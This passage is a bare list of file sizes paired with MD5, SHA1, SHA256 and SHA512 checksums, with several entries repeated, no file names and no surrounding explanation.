SHA512: cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Filesize: 1.1MB
MD5: 17daa2459db2c35a6bce85f9c50ce6e1
SHA1: 73812f97c50d8ec2540274b8524d0a1406937c04
SHA256: 7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
SHA512: cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Filesize: 1.1MB
MD5: 17daa2459db2c35a6bce85f9c50ce6e1
SHA1: 73812f97c50d8ec2540274b8524d0a1406937c04
SHA256: 7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
SHA512: cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Filesize: 181KB
MD5: fe6bd020ec20bb2df56a84d14805627e
SHA1: 9e091bc5b6e93c63a99329e4a1295a397f647abc
SHA256: e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3
SHA512: 60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

Filesize: 181KB
MD5: fe6bd020ec20bb2df56a84d14805627e
SHA1: 9e091bc5b6e93c63a99329e4a1295a397f647abc
SHA256: e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3
SHA512: 60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

Filesize: 181KB
MD5: fe6bd020ec20bb2df56a84d14805627e
SHA1: 9e091bc5b6e93c63a99329e4a1295a397f647abc
SHA256: e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3
SHA512: 60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 5.5MB
MD5: f6a32dbc8dbe32b85e62ce48bf345252
SHA1: 7fb5047b008659847d5de65d5dd9952f346c1f03
SHA256: c2811e9795aa11a2221e4f77c3cf9ce19f8b757a9b28cb0926f07404d1be5ca0
SHA512: cd92433face3016046aa701c9f7d0e5b3c458de7f16febe97d7161496186c55bc61c984c9fed041f676f81929a659f2e4db79fa4df1d9067c5f33b8a8b9602ae

Filesize: 48KB
MD5: 1e8a020876016dfb400e1f94db3dd866
SHA1: fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256: 463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512: 298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Filesize: 48KB
MD5: 1e8a020876016dfb400e1f94db3dd866
SHA1: fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256: 463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512: 298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0